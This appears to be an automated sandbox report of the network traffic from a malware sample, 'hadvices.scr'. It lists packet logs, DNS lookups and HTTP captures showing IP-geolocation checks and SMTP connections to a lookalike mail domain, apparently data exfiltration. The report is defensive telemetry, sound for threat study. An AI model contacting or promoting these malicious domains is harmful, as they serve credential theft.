May 1, 2024 15:17:21.593058109 CEST | 49715 | 443 | 192.168.2.7 | 23.56.12.145
May 1, 2024 15:17:21.593350887 CEST | 49715 | 443 | 192.168.2.7 | 23.56.12.145
May 1, 2024 15:17:21.593364000 CEST | 443 | 49715 | 23.56.12.145 | 192.168.2.7
May 1, 2024 15:17:21.896629095 CEST | 443 | 49715 | 23.56.12.145 | 192.168.2.7
May 1, 2024 15:17:21.907315969 CEST | 49715 | 443 | 192.168.2.7 | 23.56.12.145
May 1, 2024 15:17:21.907327890 CEST | 443 | 49715 | 23.56.12.145 | 192.168.2.7
                                                    May 1, 2024 15:17:21.908248901 CEST4434971523.56.12.145192.168.2.7
                                                    May 1, 2024 15:17:21.908319950 CEST49715443192.168.2.723.56.12.145
                                                    May 1, 2024 15:17:21.911990881 CEST49715443192.168.2.723.56.12.145
                                                    May 1, 2024 15:17:21.912044048 CEST4434971523.56.12.145192.168.2.7
                                                    May 1, 2024 15:17:21.913016081 CEST49715443192.168.2.723.56.12.145
                                                    May 1, 2024 15:17:21.913021088 CEST4434971523.56.12.145192.168.2.7
                                                    May 1, 2024 15:17:21.998742104 CEST49715443192.168.2.723.56.12.145
                                                    May 1, 2024 15:17:22.019324064 CEST4434971523.56.12.145192.168.2.7
                                                    May 1, 2024 15:17:22.019535065 CEST4434971523.56.12.145192.168.2.7
                                                    May 1, 2024 15:17:22.019582987 CEST49715443192.168.2.723.56.12.145
                                                    May 1, 2024 15:17:22.079608917 CEST49715443192.168.2.723.56.12.145
                                                    May 1, 2024 15:17:22.079622030 CEST4434971523.56.12.145192.168.2.7
                                                    May 1, 2024 15:17:23.038424015 CEST49705443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:26.473227978 CEST4972080192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:26.567884922 CEST8049720193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:26.567959070 CEST4972080192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:26.568280935 CEST4972080192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:26.662425041 CEST8049720193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:26.663008928 CEST8049720193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:26.675785065 CEST4972080192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:26.773938894 CEST8049720193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:26.911582947 CEST49724443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:26.911604881 CEST44349724172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:26.911667109 CEST49724443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:26.919344902 CEST49724443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:26.919358015 CEST44349724172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:26.943416119 CEST4972080192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:27.123106003 CEST44349724172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:27.123260975 CEST49724443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:27.126948118 CEST49724443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:27.126961946 CEST44349724172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:27.127249956 CEST44349724172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:27.194590092 CEST49724443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:27.236162901 CEST44349724172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:27.746939898 CEST44349724172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:27.747025967 CEST44349724172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:27.747315884 CEST49724443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:27.753274918 CEST49724443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:27.758217096 CEST4972080192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:27.865155935 CEST8049720193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:27.868657112 CEST49727443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:27.868686914 CEST44349727172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:27.868750095 CEST49727443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:27.869236946 CEST49727443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:27.869249105 CEST44349727172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:27.976830006 CEST4972080192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:28.067723989 CEST44349727172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:28.069926023 CEST49727443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:28.069946051 CEST44349727172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:28.641019106 CEST44349727172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:28.641138077 CEST44349727172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:28.641196966 CEST49727443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:29.658111095 CEST49727443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:29.868087053 CEST4972080192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:29.869504929 CEST4972880192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:29.962116957 CEST8049720193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:29.962176085 CEST4972080192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:29.963660955 CEST8049728193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:29.963752985 CEST4972880192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:29.975919008 CEST4972880192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:30.070677042 CEST8049728193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:30.071109056 CEST8049728193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:30.072730064 CEST49729443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:30.072776079 CEST44349729172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:30.072882891 CEST49729443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:30.073189020 CEST49729443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:30.073201895 CEST44349729172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:30.177757025 CEST4972880192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:30.270634890 CEST44349729172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:30.281691074 CEST49729443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:30.281708002 CEST44349729172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:30.858088017 CEST44349729172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:30.858176947 CEST44349729172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:30.858460903 CEST49729443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:30.858712912 CEST49729443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:30.861816883 CEST4972880192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:30.862955093 CEST4973080192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:30.956157923 CEST8049728193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:30.956490993 CEST4972880192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:30.957073927 CEST8049730193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:30.957156897 CEST4973080192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:30.957253933 CEST4973080192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:31.051335096 CEST8049730193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:31.052700996 CEST8049730193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:31.054580927 CEST49731443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:31.054621935 CEST44349731172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:31.054752111 CEST49731443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:31.055058956 CEST49731443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:31.055072069 CEST44349731172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:31.105745077 CEST4973080192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:31.253866911 CEST44349731172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:31.256309986 CEST49731443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:31.256326914 CEST44349731172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:31.502748966 CEST44349731172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:31.502836943 CEST44349731172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:31.502918005 CEST49731443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:31.503284931 CEST49731443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:31.509527922 CEST4973280192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:31.603713036 CEST8049732193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:31.603785038 CEST4973280192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:31.603873968 CEST4973280192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:31.698771000 CEST8049732193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:31.698998928 CEST8049732193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:31.700340986 CEST49733443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:31.700371981 CEST44349733172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:31.700444937 CEST49733443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:31.700819969 CEST49733443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:31.700834990 CEST44349733172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:31.806756973 CEST4973280192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:31.899470091 CEST44349733172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:31.901025057 CEST49733443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:31.901047945 CEST44349733172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:32.151789904 CEST44349733172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:32.151889086 CEST44349733172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:32.152036905 CEST49733443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:32.152721882 CEST49733443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:32.158672094 CEST4973280192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:32.158679008 CEST4973480192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:32.252819061 CEST8049732193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:32.252841949 CEST8049734193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:32.253259897 CEST4973280192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:32.253271103 CEST4973480192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:32.253535032 CEST4973480192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:32.347645998 CEST8049734193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:32.348392963 CEST8049734193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:32.349486113 CEST49735443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:32.349509954 CEST44349735172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:32.349766970 CEST49735443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:32.349906921 CEST49735443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:32.349915981 CEST44349735172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:32.472523928 CEST4973480192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:32.557219028 CEST44349735172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:32.558953047 CEST49735443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:32.558974028 CEST44349735172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:33.345211029 CEST44349735172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:33.345494032 CEST44349735172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:33.345659971 CEST49735443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:33.498454094 CEST49735443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:33.904957056 CEST4973480192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:33.906318903 CEST4973680192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:33.999172926 CEST8049734193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:33.999250889 CEST4973480192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:34.000324011 CEST8049736193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:34.000439882 CEST4973680192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:34.000605106 CEST4973680192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:34.094748974 CEST8049736193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:34.095657110 CEST8049736193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:34.096967936 CEST49737443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:34.096999884 CEST44349737172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:34.097173929 CEST49737443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:34.097372055 CEST49737443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:34.097378016 CEST44349737172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:34.207045078 CEST4973680192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:34.303728104 CEST44349737172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:34.305991888 CEST49737443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:34.306010008 CEST44349737172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:34.546030998 CEST44349737172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:34.546308994 CEST44349737172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:34.546366930 CEST49737443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:34.551342964 CEST49737443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:34.567012072 CEST4973680192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:34.567950010 CEST4973880192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:34.661103010 CEST8049736193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:34.661159992 CEST4973680192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:34.661969900 CEST8049738193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:34.662044048 CEST4973880192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:34.662223101 CEST4973880192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:34.756222010 CEST8049738193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:34.757692099 CEST8049738193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:34.759180069 CEST49739443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:34.759212971 CEST44349739172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:34.759273052 CEST49739443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:34.759583950 CEST49739443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:34.759596109 CEST44349739172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:34.935220003 CEST4973880192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:34.965238094 CEST44349739172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:34.967180014 CEST49739443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:34.967195988 CEST44349739172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:35.579493046 CEST44349739172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:35.579806089 CEST44349739172.67.177.134192.168.2.7
                                                    May 1, 2024 15:17:35.579885960 CEST49739443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:35.580235004 CEST49739443192.168.2.7172.67.177.134
                                                    May 1, 2024 15:17:35.596868038 CEST4973880192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:35.690958023 CEST8049738193.122.130.0192.168.2.7
                                                    May 1, 2024 15:17:35.691019058 CEST4973880192.168.2.7193.122.130.0
                                                    May 1, 2024 15:17:35.950629950 CEST49740443192.168.2.7172.67.169.18
                                                    May 1, 2024 15:17:35.950665951 CEST44349740172.67.169.18192.168.2.7
                                                    May 1, 2024 15:17:35.950952053 CEST49740443192.168.2.7172.67.169.18
                                                    May 1, 2024 15:17:35.951556921 CEST49740443192.168.2.7172.67.169.18
                                                    May 1, 2024 15:17:35.951570988 CEST44349740172.67.169.18192.168.2.7
                                                    May 1, 2024 15:17:36.164094925 CEST44349740172.67.169.18192.168.2.7
                                                    May 1, 2024 15:17:36.164180994 CEST49740443192.168.2.7172.67.169.18
                                                    May 1, 2024 15:17:36.165852070 CEST49740443192.168.2.7172.67.169.18
                                                    May 1, 2024 15:17:36.165858984 CEST44349740172.67.169.18192.168.2.7
                                                    May 1, 2024 15:17:36.166260004 CEST44349740172.67.169.18192.168.2.7
                                                    May 1, 2024 15:17:36.167627096 CEST49740443192.168.2.7172.67.169.18
                                                    May 1, 2024 15:17:36.208126068 CEST44349740172.67.169.18192.168.2.7
                                                    May 1, 2024 15:18:15.449634075 CEST44349740172.67.169.18192.168.2.7
                                                    May 1, 2024 15:18:15.449717999 CEST44349740172.67.169.18192.168.2.7
                                                    May 1, 2024 15:18:15.449774981 CEST49740443192.168.2.7172.67.169.18
                                                    May 1, 2024 15:18:15.453686953 CEST49740443192.168.2.7172.67.169.18
                                                    May 1, 2024 15:18:21.736783981 CEST49743587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:21.921859980 CEST58749743108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:21.921962976 CEST49743587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:22.234245062 CEST58749743108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:22.237030983 CEST49743587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:22.422550917 CEST58749743108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:22.423414946 CEST49743587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:22.608987093 CEST58749743108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:22.609481096 CEST49743587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:22.815016031 CEST58749743108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:22.816876888 CEST49743587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:23.002016068 CEST58749743108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:23.005209923 CEST49743587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:23.209431887 CEST58749743108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:23.212903023 CEST49743587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:23.397943974 CEST58749743108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:23.398072958 CEST58749743108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:23.398628950 CEST49743587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:23.398679972 CEST49743587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:23.398705006 CEST49743587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:23.398718119 CEST49743587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:23.583635092 CEST58749743108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:23.584955931 CEST58749743108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:23.629108906 CEST49743587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:32.787504911 CEST49743587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:33.015887976 CEST58749743108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:33.174777985 CEST58749743108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:33.174844027 CEST49743587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:33.174887896 CEST49743587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:33.175735950 CEST49744587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:33.360044956 CEST58749743108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:33.360318899 CEST58749744108.167.142.65192.168.2.7
                                                     Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                     May 1, 2024 15:17:06.882311106 CEST | 192.168.2.7 | 1.1.1.1 | 0xc48b | Standard query (0) | advising-receipts.com | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:17:26.341912985 CEST | 192.168.2.7 | 1.1.1.1 | 0x2e6 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:17:26.810415983 CEST | 192.168.2.7 | 1.1.1.1 | 0xc5dd | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:17:35.597450018 CEST | 192.168.2.7 | 1.1.1.1 | 0x8a23 | Standard query (0) | scratchdreams.tk | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:17:58.973305941 CEST | 192.168.2.7 | 1.1.1.1 | 0xbebc | Standard query (0) | scratchdreams.tk | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:18:21.492137909 CEST | 192.168.2.7 | 1.1.1.1 | 0x3837 | Standard query (0) | mail.qoldenfrontier.com | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:18:36.661045074 CEST | 192.168.2.7 | 1.1.1.1 | 0x5783 | Standard query (0) | mail.qoldenfrontier.com | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:19:00.724261045 CEST | 192.168.2.7 | 1.1.1.1 | 0xe3c4 | Standard query (0) | mail.qoldenfrontier.com | A (IP address) | IN (0x0001) | false
                                                     Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                     May 1, 2024 15:17:06.986912012 CEST | 1.1.1.1 | 192.168.2.7 | 0xc48b | No error (0) | advising-receipts.com | - | 172.67.141.195 | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:17:06.986912012 CEST | 1.1.1.1 | 192.168.2.7 | 0xc48b | No error (0) | advising-receipts.com | - | 104.21.27.63 | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:17:26.437238932 CEST | 1.1.1.1 | 192.168.2.7 | 0x2e6 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                     May 1, 2024 15:17:26.437238932 CEST | 1.1.1.1 | 192.168.2.7 | 0x2e6 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:17:26.437238932 CEST | 1.1.1.1 | 192.168.2.7 | 0x2e6 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:17:26.437238932 CEST | 1.1.1.1 | 192.168.2.7 | 0x2e6 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:17:26.437238932 CEST | 1.1.1.1 | 192.168.2.7 | 0x2e6 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:17:26.437238932 CEST | 1.1.1.1 | 192.168.2.7 | 0x2e6 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:17:26.909460068 CEST | 1.1.1.1 | 192.168.2.7 | 0xc5dd | No error (0) | reallyfreegeoip.org | - | 172.67.177.134 | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:17:26.909460068 CEST | 1.1.1.1 | 192.168.2.7 | 0xc5dd | No error (0) | reallyfreegeoip.org | - | 104.21.67.152 | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:17:35.949825048 CEST | 1.1.1.1 | 192.168.2.7 | 0x8a23 | No error (0) | scratchdreams.tk | - | 172.67.169.18 | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:17:35.949825048 CEST | 1.1.1.1 | 192.168.2.7 | 0x8a23 | No error (0) | scratchdreams.tk | - | 104.21.27.85 | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:17:59.334547043 CEST | 1.1.1.1 | 192.168.2.7 | 0xbebc | No error (0) | scratchdreams.tk | - | 172.67.169.18 | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:17:59.334547043 CEST | 1.1.1.1 | 192.168.2.7 | 0xbebc | No error (0) | scratchdreams.tk | - | 104.21.27.85 | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:18:21.734651089 CEST | 1.1.1.1 | 192.168.2.7 | 0x3837 | No error (0) | mail.qoldenfrontier.com | - | 108.167.142.65 | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:18:36.901560068 CEST | 1.1.1.1 | 192.168.2.7 | 0x5783 | No error (0) | mail.qoldenfrontier.com | - | 108.167.142.65 | A (IP address) | IN (0x0001) | false
                                                     May 1, 2024 15:19:00.966758966 CEST | 1.1.1.1 | 192.168.2.7 | 0xe3c4 | No error (0) | mail.qoldenfrontier.com | - | 108.167.142.65 | A (IP address) | IN (0x0001) | false
                                                    • advising-receipts.com
                                                    • armmf.adobe.com
                                                    • reallyfreegeoip.org
                                                    • scratchdreams.tk
                                                    • checkip.dyndns.org
                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     0 | 192.168.2.7 | 49720 | 193.122.130.0 | 80 | 8336 | C:\Windows\Temp\hadvices.scr
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 1, 2024 15:17:26.568280935 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                     May 1, 2024 15:17:26.663008928 CEST | 273 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:26 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 104
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>
                                                     May 1, 2024 15:17:26.675785065 CEST | 127 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                     May 1, 2024 15:17:26.773938894 CEST | 273 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:26 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 104
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>
                                                    May 1, 2024 15:17:27.758217096 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    May 1, 2024 15:17:27.865155935 CEST273INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:27 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 104
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49728 | 193.122.130.0 | 80 | 8336 | C:\Windows\Temp\hadvices.scr
Timestamp | Bytes transferred | Direction | Data
May 1, 2024 15:17:29.975919008 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
May 1, 2024 15:17:30.071109056 CEST | 273 | IN | HTTP/1.1 200 OK
Date: Wed, 01 May 2024 13:17:30 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
